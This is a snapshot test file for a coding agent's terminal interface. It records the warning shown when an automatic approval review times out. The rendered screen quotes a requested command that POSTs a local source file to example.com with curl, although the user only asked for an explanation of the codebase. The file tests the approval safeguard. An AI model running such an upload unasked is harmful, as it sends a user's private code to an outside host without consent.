codex-rs/tui/src/chatwidget/snapshots/darwin_code_tui__chatwidget__tests__guardian_timed_out_exec_renders_warning_and_timed_out_request.snap
---
source: tui/src/chatwidget/tests/guardian.rs
expression: normalize_snapshot_paths(term.backend().vt100().screen().contents())
---


⚠ Automatic approval review timed out while evaluating the requested approval.

✗ Review timed out before darwin_code could run curl -sS -i -X POST --data-bina
  ry @core/src/darwin_code.rs https://example.com

╭───────────────────────────────────────╮
│ >_ OpenAI DarwinCode (v0.0.0)         │
│                                       │
│ model:     loading   /model to change │
│ directory: /tmp/project               │
╰───────────────────────────────────────╯

• Working (0s • esc to interrupt)


› Explain this codebase

  gpt-5.3-darwin-code default · /tmp/project
